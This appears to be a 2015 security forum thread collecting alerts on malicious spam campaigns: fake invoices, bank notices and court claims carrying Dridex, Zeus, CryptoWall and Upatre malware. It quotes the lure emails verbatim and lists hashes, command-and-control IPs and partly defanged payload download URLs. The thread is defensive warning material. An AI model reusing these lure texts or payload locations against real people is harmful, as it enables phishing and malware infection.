29 April 2015: in_my_home.zip: Extracts to: in_my_home.scr
Current Virus total detections: 7/55*. Automatic analysis at MALWR show it to be a Zeus banking Trojan. Creates a windows hook that monitors keyboard input (keylogger), creates Zeus (Banking Trojan) mutexes, mutex: MPSWabDataAccessMutex, creates an Alternate Data Stream (ADS) file: C:\WINDOWS\system32\commtui2.exe:Zone.Identifier, Installs itself for autorun at Windows startup... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/5eeac9e8d3e8ede6e5a8269a9ba4962ee26335ff30e73c838cdb73675eb7283c/analysis/1430289254/
___
JavaScript malware
- http://myonlinesecurity.co.uk/javascript-malware/
29 Apr 2015 - "JavaScript malware is a different way of spreading malware. We have been seeing a steady increase in a different form of malware spreading. The bad guys are sending javascript files inside a zip or at the end of a link. We have seen several different email templates for this method ranging from:
- E-Ticket 7694892 pretending to come from E-Ticket <online@ ticket .com>
> http://myonlinesecurity.co.uk/e-ticket-7694892-american-airlines-e-ticket-services-javascript-malware/
- Order 595775 which contains a simple email reading something like “Good Day! Find Order 595775 attached Thank you Jim Olsen” These also come in as -fake- invoices with random numbers and random names and senders. You normally find the name in body of email matches the name of the alleged sender.
These particular js files (JavaScript malware) download & install a cryptowall 3.0 malware which will encrypt all your files on the computer and prevent access to them. There is absolutely -no- fix once you are infected so it is essential to have a full working backup and make sure it is stored off the computer. These cryptowall Trojans are -network- aware and will -encrypt- -all- -network- disks and external hard discs as well as the computer hard disc.
All the alleged senders, companies, names of employees and phone numbers mentioned in the emails are all innocent and are just picked at random. Some of these companies will exist and some won’t. -Don’t- try to respond by phone or email, all you will do is end up with an innocent person or company who have had their details spoofed and picked at random from a long list that the bad guys have previously found. The bad guys choose companies, Government departments and organisations with subjects that are designed to entice you or alarm you into blindly opening the attachment or clicking-the-link in the email to see what is happening... The basic rule is NEVER open -any- attachment to an email, unless you are expecting it..."
- http://blogs.cisco.com/security/talos/cryptowall-3-0
___
Fake 'HBSC credit' SPAM - PDF malware
- http://myonlinesecurity.co.uk/new-credit-terms-from-hsbc-fake-pdf-malware/
29 Apr 2015 - "'New credit terms from HSBC' coming from random names at random email addresses with a zip attachment is another one from the current bot runs... The email looks like:
Sir/Madam,
We are pleased to inform you that our bank is ready to offer you a bank loan.
We would like to ask you to open the Attachment to this letter and read the terms.
Yours faithfully,
Global Payments and Cash Management
HSBC
29 April 2015: mail2.zip: Extracts to: Payment.exe
Current Virus total detections: 1/56*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/76428876027d4d96f1365d35a05612e56c8da14ec6f30dd8ad29765eee20f1f5/analysis/1430307499/
___
Fake 'BACS payment' SPAM - PDF malware
- http://myonlinesecurity.co.uk/sales-hello-please-find-downloaded-notification-of-your-bacs-payment-from-essex-county-council-fake-pdf-malware/
28 Apr 2015 - "An email saying 'Please find downloaded notification of your BACS payment from Essex County Council' with a subject of 'Hello (your email address)' pretending to come from sales with a zip attachment is another one from the current bot runs... The email looks like:
Please find downloaded notification of your BACS payment from Essex County Council.
If you require further information please refer to the contact details in the attached document.
BACS Remittance Advice generated automatically by 2e2 on behalf of Essex County Council.
Paramat 60
85 rue des jacobins
60740 Saint maximin
Tel : 03.44.66.03.47
28 April 2015: Random Attachment zip name: Extracts to: INVOICE.exe
Current Virus total detections: 2/56*. This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/817bf392cf2a10fee49ff72c04f03ae8ccfa15f434c6cca75a247cc5ca725f07/analysis/1430219199/
... Behavioural information
TCP connections
166.78.246.145: https://www.virustotal.com/en/ip-address/166.78.246.145/information/
81.7.109.65: https://www.virustotal.com/en/ip-address/81.7.109.65/information/
188.255.252.242: https://www.virustotal.com/en/ip-address/188.255.252.242/information/
UDP communications
23.102.23.44: https://www.virustotal.com/en/ip-address/23.102.23.44/information/
___
Incoming MMS Spam
- http://threattrack.tumblr.com/post/117690961748/incoming-mms-spam
Apr 29, 2015 - "Subjects Seen
Incoming mms from +07452136643
Typical e-mail details:
No.: +07452136643
Size: 8971
ID: OHB.45598A07E.7385
Filename: OHB.45598A07E.7385.cab
Billie Souto
Malicious File Name and MD5:
OHB.45598A07E.7385.scr (d2843ca1919e48c16c98673210e0c3d2)
Screenshot: https://41.media.tumblr.com/bc77a6325bca8c0a3ae49c17e4918587/tumblr_inline_nnkp06rrby1r6pupn_500.png
Tagged: MMS, ctb locker
___
Fake Chinese domain SCAMs
- http://blog.dynamoo.com/2015/04/cnwebregistrycn-chinaygregistrycom-scam.html
29 Apr 2015 - "This spam email is actually part of a long-running Chinese scam.
From: Jim Bing [jim.bing@ cnwebregistry .cn]
Date: 29 April 2015 at 14:27
Subject: Re:"[redacted]"
Dear CEO,
(If you are not the person who is in charge of this, please forward this to your CEO, because this is urgent, Thanks)
We are a Network Service Company which is the domain name registration center in Shanghai, China.
We received an application from Huayu Ltd on April 27, 2015. They want to register " [redacted] " as their Internet Keyword and " [redacted] .cn "、" [redacted] .com.cn " 、" [redacted] .net.cn "、" [redacted] .org.cn " domain names etc.., they are in China domain names. But after checking it, we find " [redacted] " conflicts with your company. In order to deal with this matter better, so we send you email and confirm whether this company is your distributor or business partner in China or not?
Best Regards,
Jim
General Manager
Whoever "Huayu Ltd" are is irrelevant, as they aren't actually interested in registering these domains, even if they exist. Instead, this is an attempt by a -rogue- Chinese domain registrar to get you to buy -overpriced- and -worthless- domains. In this case the spam mentions the domain cnwebregistry .cn, but chinaygregistry .com is also on the same server and will be similarly fraudulent. This video I made a while ago explains the scam in more detail..."
(Video @ the dynamoo URL above.)
:fear::fear: :mad:
AplusWebMaster
2015-04-30, 14:54
FYI...
Fake 'Telephone order' SPAM - malicious doc attachment
- http://blog.dynamoo.com/2015/04/malware-spam-rebecca-mcdonnell.html
30 Apr 2015 - "This fake financial email is not from Gas Cylinders UK but is instead a simple -forgery- with a malicious attachment.
From: Rebecca McDonnell [rebecca@ gascylindersuk .co .uk]
Date: 30 April 2015 at 09:54
Subject: Telephone order form
Telephone order form attached
Regards,
Rebecca McDonnell
Business Administrator
340a Haydock Lane, Haydock Industrial Estate,
St Helens, Merseyside, WA11 9UY
DDI: 01744 304338
Fax: 01942 275 312 ...
There is a malicious Word document attached with the name TELEPHONE PURCHASE ORDER FORM.doc which probably comes in a few different variants, but the one I saw had a VirusTotal detection rate of 4/56* and contained this malicious macro... which downloaded a component from the following location:
http ://morristonrfcmalechoir .org/143/368.exe
This is saved as %TEMP%\serebok2.exe and has detection rate of 8/56**. Analysis tools are a bit patchy today, but the VirusTotal report indicates traffic to:
212.227.89.182 (1&1, Germany)
The Malwr report reported a dropped Dridex DLL with a detection rate of 3/55***."
* https://www.virustotal.com/en/file/3ff341262900d33574bab920f9d7f15a21db3f6c4a931e17dbaabd09d3c5fd71/analysis/1430390792/
** https://www.virustotal.com/en/file/6ccd4c74673dde8c75e26b99ba87b7afedfcf4b90336bafbb2c662211877cd82/analysis/1430390534/
*** https://www.virustotal.com/en/file/29ed0520277d94f50fe39d893da883952ccb74d588574799040bfc813bc08f0b/analysis/1430392218/
- http://myonlinesecurity.co.uk/telephone-order-form-rebecca-mcdonnell-word-doc-or-excel-xls-spreadsheet-malware/
30 Apr 2015
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Telephone-order-form.png
30 April 2015 : TELEPHONE PURCHASE ORDER FORM.doc - Current Virus total detections: 4/55*
... which downloads and runs nishatdairy .com/143/368.exe which is saved as %Temp%\serebok3.exe and autoruns (virus Total**)..."
* https://www.virustotal.com/en/file/10e55770ea40c6910f5cf484438a30874c3a994d7df65cbe8a1c1460efb34e8c/analysis/1430379008/
** https://www.virustotal.com/en/file/6ccd4c74673dde8c75e26b99ba87b7afedfcf4b90336bafbb2c662211877cd82/analysis/1430379609/
___
Fake 'Statement' SPAM - PDF malware
- http://myonlinesecurity.co.uk/statement-of-account-fake-pdf-malware/
30 Apr 2015 - "'Statement of Account 5905779365764954' (random number) coming from random names and email addresses with a zip attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/04/Statement-of-Account-5905779365764954.png
30 April 2015 : random name : Extracts to: statement.exe | Account_info.exe | Docs_23131445.exe
Current Virus total detections: 1/55* |1/55** | 1/55*** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/bd682c0a99ce6fa4e0c2a0857d6b29e74c1e1b49d01d36e3adf8876c22499702/analysis/1430384002/
** https://www.virustotal.com/en/file/a446d5f72aceae8b24946b1dc86e6dbd3ac8b514953b6c19bd7ebd20da75ba8a/analysis/1430384014/
*** https://www.virustotal.com/en/file/1da90a80b6bbe8deda021c3073f7714ebb500ef693f05e4b67700bef0dc7d508/analysis/1430384178/
___
Fake 'Amended Invoice' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/attached-amended-invoice-115784-re-dn-103674-9415-word-doc-or-excel-xls-spreadsheet-malware/
30 Apr 2015 - "'Attached Amended Invoice 115784 Re D/N 103674. 9/4/15' pretending to come from accounts@ procterscheeses .co.uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email body is totally -blank-. This contains exactly the -same- malware as today’s earlier spam run of malicious word docs Telephone order form – Rebecca McDonnell — word doc or excel xls spreadsheet malware*... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/telephone-order-form-rebecca-mcdonnell-word-doc-or-excel-xls-spreadsheet-malware/
___
Nepal Earthquake Disaster - Email Scams
- https://www.us-cert.gov/ncas/current-activity/2015/04/30/Nepal-Earthquake-Disaster-Email-Scams
April 30, 2015 - "... potential email scams regarding the earthquake in Nepal. The scam emails may contain links or attachments that may direct users to phishing or malware infected websites. Phishing emails and websites requesting donations for -fraudulent- charitable organizations commonly appear after these types of natural disasters..."
:fear::fear: :mad:
AplusWebMaster
2015-05-01, 14:12
FYI...
Fake 'Invoice' SPAM - doc/xls malware attached
- http://myonlinesecurity.co.uk/berendsen-uk-ltd-invoice-60022446-344-word-doc-or-excel-xls-spreadsheet-malware/
1 May 2015 - "'Berendsen UK Ltd Invoice 60022446 344' pretending to come from donotreply@ berendsen .co .uk with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/Berendsen-UK-Ltd-Invoice-60022446-344.png
1 May 2015 : IRN001610_60022446_I_01_01.doc - Current Virus total detections: 2/56*
... which connects to & download laurelwoodvirginia .com/654/46.exe which is saved as %temp%\serebok5.exe and -autorun- on your computer (virus Total**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/7f9ad5e44e357130fd8dcfdceb01342b011106d41b92a92792b950882a938187/analysis/1430472222/
** https://www.virustotal.com/en/file/e7c6153b40dd6e57cc3d2516a0fcc8d65a33559eb266bc211ba0514915972818/analysis/1430476073/
... Behavioural information
TCP connections
212.227.89.182: https://www.virustotal.com/en/ip-address/212.227.89.182/information/
88.221.15.80: https://www.virustotal.com/en/ip-address/88.221.15.80/information/
UDP communications
104.41.150.68: https://www.virustotal.com/en/ip-address/104.41.150.68/information/
laurelwoodvirginia .com: 66.175.58.9: https://www.virustotal.com/en/ip-address/66.175.58.9/information/
___
Fake 'Claim' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/copy-of-claim-passed-for-consideration-to-hm-courts-ref-word-doc-or-excel-xls-spreadsheet-malware/
1 May 2015 - "'Copy of claim passed for consideration to HM Courts Ref: [random numbers] from [random companies]' coming from random names and email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like this, but be aware that every email will have a -different- random claim number and -different- company listed as the claimant:
SOVEREIGN MINES OF AFRICA PLC has issued the claim against you and passed for consideration to HM Courts Ref:[EK8013GUH].The claim was read, and passed to the second reading. For these or other notarial acts, or the legalising of documents, please contact SOVEREIGN MINES OF AFRICA PLC as soon as posible.
So far I have seen:
- Copy of claim passed for consideration to HM Courts Ref:[EK8013GUH] from SOVEREIGN MINES OF AFRICA PLC
- Copy of claim passed for consideration to HM Courts Ref:[UK1751MQV] from FALKLAND OIL & GAS
- Copy of claim passed for consideration to HM Courts Ref:[EI6841DHZ] from BREEDON AGGREGATES LTD
- Copy of claim passed for consideration to HM Courts Ref: from WILLIAM HILL PLC
- Copy of claim passed for consideration to HM Courts Ref:[FZ8349DFN] from GAZPROM OAO
- Copy of claim passed for consideration to HM Courts Ref:[WY4077WQJ] from Hardy Amies Ltd
- Copy of claim passed for consideration to HM Courts Ref:[GX0331SJB] from Nathaniel Lichfield and Partners
25 February 2015 : EI6841DHZ.doc | EK8013GUH.doc | UK1751MQV.doc
Current Virus total detections: 0/56* | 0/56** | 0/56***
... at least one of these macros downloads from pastebin .com/download.php?i=XEKaxHCg and verifed. acgfamilyoffices. com/ebn/logo.jpg (so far I have not been able to get the content but am still trying)..."
* https://www.virustotal.com/en/file/3237dc9e4c04859a0834e6813f5c520b68c1657a5ddf3312e650ae028aff8341/analysis/1430477322/
** https://www.virustotal.com/en/file/d7a1daf2a29a92373098aebfa4e3ce029b378e6e9de7edd5ce9c9f398801530d/analysis/1430477337/
*** https://www.virustotal.com/en/file/99fd744bf923907d01d92a445b80abfb0cb6bacde5a485a89011486eb4ef589f/analysis/1430477346/
- http://blog.mxlab.eu/2015/05/01/email-copy-of-claim-passed-for-consideration-to-hm-courts-contains-malicious-word-file/
May 1, 2015
> https://www.virustotal.com/en/file/369089330844a7b2ac152ea2207b076123ee07f9d098d024ce67fc8bc016fd89/analysis/1430480904/
File name: ZI2444LQN.doc
Detection ratio: 0/56
___
[b]Fake 'Delivery confirmation' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/delivery-confirmation-form-for-purchase-bw91149jya-from-300415-word-doc-or-excel-xls-spreadsheet-malware/
1 May 2015 - "'Delivery confirmation form for purchase BW91149JYA [random numbers]' from 30/04/15 coming from random names and email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
Please fill out the attached form and return it to us.
Best regards, Antonia Lang
The name in the body of the email matches the alleged sender. The purchase number in the subject matches the attachment name. The malware payload is exactly the -same- as the payload in today’s earlier spam run of malicious word docs 'Copy of claim passed for consideration to HM Courts Ref:...' – word doc or excel xls spreadsheet malware*. The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* http://myonlinesecurity.co.uk/copy-of-claim-passed-for-consideration-to-hm-courts-ref-word-doc-or-excel-xls-spreadsheet-malware/
:fear: :mad:
AplusWebMaster
2015-05-04, 20:36
FYI...
Fake 'Unaccepted account' SPAM – PDF malware
- http://myonlinesecurity.co.uk/holded-account-notification-unaccepted-account-caution-fake-pdf-malware/
4 May 2015 - "An email coming from random senders and random email addresses with subjects of 'Holded account notification' or 'Unaccepted account caution' or similar vaguely banking related subjects with a zip attachment is another one from the current bot runs... Some subjects seen with this series of spam emails are:
Blocked bank operation report
Holded account notification
Unaccepted account caution
Rejected operation warning
Blocked transaction warning
Some attachment names are:
block_warning_information.zip
nullfication_alert_details.zip
rejection_message_data.zip
rejection_notification_form.zip
invalidation_alert_document.zip
The email looks like:
Be noted that your depositis rejected.
Please see the report for detailed information.
Susan Morgan
Account Security Department
-Or-
Be adviced that your payment not accepted.
Please see the document for detailed information.
Mary Roberts
Senior Manager
-Or-
We inform you that your fund not accepted.
Please look the document for detailed information.
Jane Jones
Senior Manager
4 May : block_warning_information.zip | nullfication_alert_details.zip
Extracts to: block_warning_report.exe | abrogation_warning_information.exe
Current Virus total detections: 1/55* | 1/55** . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/2af59e5d0157d9874c3372d950256f0de401ab86af61a750fa99e297f1d0bbc1/analysis/
... Behavioural information
TCP connections
166.78.246.145: https://www.virustotal.com/en/ip-address/166.78.246.145/information/
91.211.17.201: https://www.virustotal.com/en/ip-address/91.211.17.201/information/
38.124.60.223: https://www.virustotal.com/en/ip-address/38.124.60.223/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
UDP communications
191.233.81.105: https://www.virustotal.com/en/ip-address/191.233.81.105/information/
** https://www.virustotal.com/en/file/9937ae20432cac5eb0c5531233331c3a5f626cada84b02bfa822bc233d53110a/analysis/1430748957/
... Behavioural information
TCP connections
104.130.28.231: https://www.virustotal.com/en/ip-address/104.130.28.231/information/
91.211.17.201: https://www.virustotal.com/en/ip-address/91.211.17.201/information/
38.124.60.223: https://www.virustotal.com/en/ip-address/38.124.60.223/information/
88.221.14.249: https://www.virustotal.com/en/ip-address/88.221.14.249/information/
UDP communications
23.101.187.68: https://www.virustotal.com/en/ip-address/23.101.187.68/information/
- https://isc.sans.edu/diary.html?storyid=19657
2015-05-05
___
ACH Spam
- http://threattrack.tumblr.com/post/118138846488/ach-spam
May 4, 2015 - "Subjects Seen:
ACH Approval Letter
Typical e-mail details:
The Automated Clearing House (ACH) application for your company has been processed and the payer unit number assigned is 029762. This number identifies to the Federal Reserve Bank of Cleveland the account to be debited and is required input in the “ABI ACH Payment Authorization Input Record.” It is the responsibility of the payer to use the correct payer unit number in every transaction in which statements are paid via ACH.
You may begin paying statements via ACH. If you are a Customhouse broker who is using ACH for the first time, please contact your ABI client representative to request that your ABI records be updated to permit ACH filing. If you are already using ACH for other importer statement transmissions, you do not need to contact your ABI client representative. If you are a new ABI importer, please contact your ABI client representative to ensure that the appropriate ABI records are updated to permit you to transmit entry summaries, which will be filed under ACH...
If you have any questions, you may contact ACH Help Desk at (317) 298-1200, extension 1098.
Sincerely,
Cindi Miller, Chief
Collections Refunds and Analysis Branch
Revenue Division
Thank You,
Kirsten Anderson
Malicious File Name and MD5:
ACH_Import_Information.scr (bc7bb730e98fcde7044251784e0d8ceb)
Tagged: ACH, Upatre
___
Macro Malware: Old Tricks still Work ...
- http://blog.trendmicro.com/trendlabs-security-intelligence/macro-malware-when-old-tricks-still-work-part-1/
May 4, 2015 - "Now comes a time when we are reminded of why this security warning prompt in Microsoft Word matters:
Microsoft Word security warning for macros:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/04/Figure01.jpg
... We’ve already seen signs of macro malware in the threat landscape a year ago with the W97M_SHELLHIDE.A and TSPY_ZBOT.DOCM combination. At first, we thought that it was just a chance encounter but, as covered in our recent report on BARTALEX, the method of distributing malware through the misuse of macros has borne the likes of DRIDEX, ROVNIX and VAWTRAK into computer systems from the latter part of 2014 up to this year. What’s more, we noticed that this resurgence of macro malware has a single area of focus: enterprises. Enterprises were heavily affected by a spam outbreak involving macro malware. We saw that macro malware detections in Q1 2015 drove huge numbers:
Q1 2015 MS Word and Excel malware detections:
> https://blog.trendmicro.com/trendlabs-security-intelligence/files/2015/04/Figure-2.jpg
This data is based on feedback from Trend Micro’s Smart Protection Network, representing files that have been detected on endpoints. The following conclusions can be drawn:
- The two common malware families seen are W97M_MARKER and W2KM_DLOADR.
- You can see X2KM_DLOADR detections around the start of February.
- A couple more significant ones like W2KM_DOXMAL and W2KM_MONALIS started showing up on the 2nd week of March
- Finally, W2KM_BARTALEX started picking up middle of February and was seen up to the last week of March... The macro code was instrumental in dropping the .DLL file that instated the malware, GHOLE. Targeted attack campaigns would usually use vulnerabilities that had been determined to be effective on a target, or even zero-day vulnerabilities. This operation, however, had taken a much easier route of using the tired, old method of traditional malware. If you take the methods employed by GHOLE, ZBOT, DRIDEX, ROVNIX and VAWTRAK, we’ve all seen them in the past – as well as macro malware and email-borne threats... the right time has come and known threats are repackaged with old methods, resulting to what we now determine to be equally effective..."
___
Fiesta EK wreaks havoc on popular Torrent Site
- https://blog.malwarebytes.org/exploits-2/2015/05/fiesta-ek-wreaks-havoc-on-popular-torrent-site/
May 4, 2015 - "... Beside the illegal nature of the act in some countries, many sites that index torrents are filled with aggressive ads and pop ups often tricking the user to run programs and other junk that they don’t need. To get the actual content you were looking for is often a battle that could end with some unwanted toolbars added to your browser, or worse, malware. Such is the case with popular Torrent index SubTorrents .com, a very popular Torrent in Spain and Latin America... Users trying to download their favourite TV show may end up getting more than they were looking for. Upon browsing the site, a malicious -redirection- silently loads the Fiesta exploit kit and associated malware payload. Fortunately, Malwarebytes Anti-Exploit users were shielded from this threat... Given the large amounts of ads on the site, it would have been fair to suspect a malvertising issue, but this was not the case here. Rather, the site itself has been -compromised- and serves a well hidden iframe... the author had some fun trying to make things a little more complicated. Rather than directly inserting a malicious iframe (to the exploit kit landing), they chose to build it on the fly by retrieving the content from an external .js... The exploit kit is Fiesta EK and we noticed a new format, where semi colons are now commas... Downloading illegal Torrents is dangerous business. On top of fake files that waste your time and bandwidth, users have to navigate through a sea of misleading ads and pop ups. They may end up saving a few bucks off that latest movie but could also risk a lot more, like getting a nasty malware infection. Ransomware being so prevalent these days could mean that all of user’s files, including those movies and songs could be encrypted and held for ransom. Regardless, it is important to stay safe from such attacks by keeping your computer up-to-date..."
(More detail at the malwarebytes URL above.)
:fear::fear: :mad:
AplusWebMaster
2015-05-05, 14:06
FYI...
Fake 'INVOICE' SPAM - doc/xls malware attached
- http://myonlinesecurity.co.uk/ref-dw95009ksg-from-050515-for-review-word-doc-or-excel-xls-spreadsheet-malware/
5 May, 2015 - "'Ref: DW95009KSG [random characters] from 05/05/15 for review' coming from random names and email addresses with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email contains an image of an invoice downloaded from a website looks like:
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/invoice_Ref-DW95009KSG-from_-for-review-1024x686.png
If you have your email client set to read in plain text only, then you get an email which just reads as pure garbled junk text.
5 May 2015 : DW95009KSG.doc - Current Virus total detections: 0/56* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/a9f30994e614d77e90f096eab66de87da0d4cc658e62314c1a5eface490252d0/analysis/1430822826/
___
Smartphone Apps secretly connect to User Tracking and Ad Sites
Security researchers have developed an automated system for detecting Android apps that secretly connect to ad sites and user tracking sites.
- http://www.technologyreview.com/view/537186/the-truth-about-smartphone-apps-that-secretly-connect-to-user-tracking-and-ad-sites/
May 1, 2015 MIT - "There are essentially two starkly different environments in which to download apps. The first is Apple’s app store, which carefully vets apps before allowing only those deemed fit to appear. The second is the Google Play store, which is more -open- because Google exercises a lighter touch in vetting apps, only excluding those that are obviously malicious. But because Google Play is more open, the apps it offers span a much wider quality range. Many connect to ad-related sites and tracking sites while some connect to much more dubious sites that are associated with malware. But here’s the problem — this activity often takes place without the owner being aware of what is going on. That’s something that most smartphone users would be appalled to discover — if only they were able to... In total, the apps connect to a mind-boggling 250,000 different urls across almost 2,000 top level domains. And while most attempt to connect to just a handful of ad and tracking sites, some are much more prolific... Most users of these apps will have little, if any, knowledge of this kind of behavior..."
(More detail at the technologyreview URL above.)
:fear: :mad:
AplusWebMaster
2015-05-06, 14:28
FYI...
Fake 'SEPA' SPAM - malware attachment
- http://myonlinesecurity.co.uk/urgent-notice-about-your-sepa-payment-malware/
6 May 2015 - "'Urgent notice about your SEPA Payment' coming from random names and email addresses with a zip attachment is another one from the current bot runs... The email looks like:
The SWIFT transaction, recently initiated from your company”s online banking account, was aborted by the Electronic Payments Association.
Aborted transfer
SWIFT Processing Case ID G10536592
Transaction Amount 38058.65 Pounds sterling
E-mail info@thespykiller .co .uk
Reason of rejection View details
Please click the address given at the top to see the statement with all details about this case.
-or-
The online transaction, recently sent from your company”s checking account, was cancelled by the other financial institution.
Rejected transfer
Transaction Case ID R89716531
Total 21696.96 GBP
Billing E-mail amy@hedgehoghelp .co .uk
Reason for rejection View details
Please click the address you can find above to open the MS Word document with the full info about this problem.
There are dozens if not -hundreds- of different -dropbox- links with this series of spam emails. It is very likely that each one will have a different sha256# so the detections on VirusTotal might well be incorrect.
6 May 2015: online Payment6688.zip : Extracts to: Rejected SWIFT Transaction.doc Word Document_86535.scr Current Virus total detections: 2/55* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper word doc instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/bcad4914d78789733a5730d8d5ca174e37c08315f52bb198a4bde45281facd5a/analysis/1430902669/
___
Fake 'Invoice 37333' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/invoice-37333-from-contract-security-services-limited-word-doc-or-excel-xls-spreadsheet-malware/
6 May 2015 - "'Invoice 37333 from CONTRACT SECURITY SERVICES LIMITED' pretending to come from accounts3 <accounts3@ contractsecurity .co .uk> with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/Invoice-37333-from-CONTRACT-SECURITY-SERVICES-LIMITED.png
6 May 2015 : Inv_37333_from_CONTRACT_SECURITY_SERVICES_LTD_3000.doc
Current Virus total detections: 2/57* ... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/20de1316fe309450b65f0a863b39271726988f7e40cd0e7bcac3e304ddb28d13/analysis/1430904557/
___
Fake 'Check your requisite' SPAM – PDF malware
- http://myonlinesecurity.co.uk/check-your-requisite-fake-pdf-malware/
6 May 2015 - "'Check your requisite' coming from random names and email addresses with a zip attachment is another one from the current bot runs... The email looks like:
Good morning
Could You please check your requisite details under the contract #4HZKYN
The contract number in the body of the email matches the zip attachment name.
6 May 2015: QmXFW4.zip: Extracts to: invalidation_invoice_report.exe
Current Virus total detections: 2/56* . This is another one of the spoofed icon files that unless you have “show known file extensions enabled“, will look like a proper PDF file instead of the .exe file it really is, so making it much more likely for you to accidentally open it and be infected..."
* https://www.virustotal.com/en/file/c639784685ce0bf59ba476b8a0aac663d573b973563167a083d33c6e27102c00/analysis/1430906359/
... Behavioural information
TCP connections
166.78.246.145: https://www.virustotal.com/en/ip-address/166.78.246.145/information/
91.211.17.201: https://www.virustotal.com/en/ip-address/91.211.17.201/information/
184.164.97.239: https://www.virustotal.com/en/ip-address/184.164.97.239/information/
90.84.60.97: https://www.virustotal.com/en/ip-address/90.84.60.97/information/
UDP communications
23.99.222.162: https://www.virustotal.com/en/ip-address/23.99.222.162/information/
___
Fake 'Transport' SPAM – doc/xls malware
- http://myonlinesecurity.co.uk/email-from-transport-for-london-word-doc-or-excel-xls-spreadsheet-malware/
6 May 2015 - "Email from 'Transport for London' pretending to come from noresponse@ cclondon .com with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs...
Screenshot: http://myonlinesecurity.co.uk/wp-content/uploads/2015/05/Email-from-Transport-for-London.png
6 May 2015 : AP0210780545.doc - Current Virus total detections: 2/57*
... which downloads from volpefurniture .com/111/46.exe (VirusTotal**)... The basic rule is NEVER open any attachment to an email, unless you are expecting it..."
* https://www.virustotal.com/en/file/c9f0ec93f4d8bfbccc60d01630bc70a5a5e3863608536f3003aa3e787801ce66/analysis/1430908758/
** https://www.virustotal.com/en/file/42b044da606588ebd897603d92765b37d3a416ee92fb983117b36d61eedd2827/analysis/1430909515/
... Behavioural information
TCP connections
62.152.36.90: https://www.virustotal.com/en/ip-address/62.152.36.90/information/
90.84.60.97: https://www.virustotal.com/en/ip-address/90.84.60.97/information/
volpefurniture .com: 192.254.142.34: https://www.virustotal.com/en/ip-address/192.254.142.34/information/
- http://blog.dynamoo.com/2015/05/malware-spam-email-from-transport-for.html
6 May 2015
... Recommended blocklist:
62.152.36.90
89.28.83.228
185.12.95.191
185.15.185.201 ..."
___
ADP Invoice Spam
- http://threattrack.tumblr.com/post/118293581183/adp-invoice-spam
May 6, 2015 - "Subjects Seen:
ADP invoice for week ending 05/06/2015
Typical e-mail details:
Your most recent ADP invoice is attached for your review.
If you have any questions regarding this invoice, please contact your ADP service team at the number provided on the invoice for assistance.
Please note that your bank account will be debited within one banking business day for the amount(s) shown on the invoice.
Thank you for choosing ADP for your business solutions.
Important: Please do not respond to this message. It comes from an unattended mailbox.
Malicious File Name and MD5:
invoice_400119471.exe (222ddd63ab85f03ff344c4328e58896c)
Tagged: ADP, Upatre
___
IRS e-Help Desk Spam
- http://threattrack.tumblr.com/post/118299463428/irs-e-help-desk-spam
May 6, 2015 - "Subjects Seen:
E-mail Receipt Confirmation - Ticket#SD0180867
Typical e-mail details:
The IRS e-help Desk has received your email on 05/06/15. A case has been opened in response to your question or issue.
Your case ID is : SD0180867
Details about this case has been attached.
If additional contact is necessary, please reference this case ID.
You will receive a reply within two business days.
Thank you for contacting the IRS e-help Desk.
Malicious File Name and MD5:
SD743299.exe (222ddd63ab85f03ff344c4328e58896c)
Tagged: IRS, Upatre
:fear: :mad:
AplusWebMaster
2015-05-07, 14:05
FYI...
Fake 'order' SPAM - doc/xls malware
- http://myonlinesecurity.co.uk/you-order-form-word-doc-or-excel-xls-spreadsheet-malware/
7 May 2015 - "'You order form:[XY12469DMM] from 06/05/15 recived; MYTRAH ENERGY LTD' ... with a malicious word doc or Excel XLS spreadsheet attachment is another one from the current bot runs... The email looks like:
We have received your order form [XY12469DMM] and we thank you very much. Our sales department informs us that they are able to dispatch your stock by the end of next week following your packing instructions.
As agreed, we have arranged transport. We are sending herewith a copy of our pro-forma invoice.
The consignment will be sent as soon as the bank informs us that the sum is available. We hope you will be satisfied with the fulfilment of this order and that it will be the beginning of a business relationship to our mutual benefit.
Best regards, Hallie Foreman
MYTRAH ENERGY LTD
